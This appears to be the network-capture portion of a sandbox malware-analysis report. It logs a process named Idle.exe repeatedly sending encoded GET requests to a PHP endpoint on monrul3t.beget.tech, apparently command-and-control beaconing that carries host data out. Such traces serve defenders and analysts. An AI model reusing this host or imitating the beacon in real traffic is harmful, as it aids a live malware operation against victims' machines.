                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.4539295.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:12.683829069 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUMNp2TwElaPNTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:13.424633980 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.4539305.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:18.432204008 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUNBp2T6FkaPdXRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:19.138179064 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.4539315.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:24.151141882 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUeFp2T1UlaPBTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:24.892333984 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.4539325.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:29.902348995 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEeVp2TwUlaPJTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:30.675657034 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.4539335.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:35.697709084 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulENJp2Tx0kaPNTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:36.418359995 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.4539345.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:41.433372974 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0MBp2T0EkaPVTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:42.175010920 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.4539355.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:47.198117018 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMFp2T4FlaPlXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:47.955065012 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.4539365.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:52.967303038 CET2947OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJBTVq9UNNp2TzEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:53.718880892 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
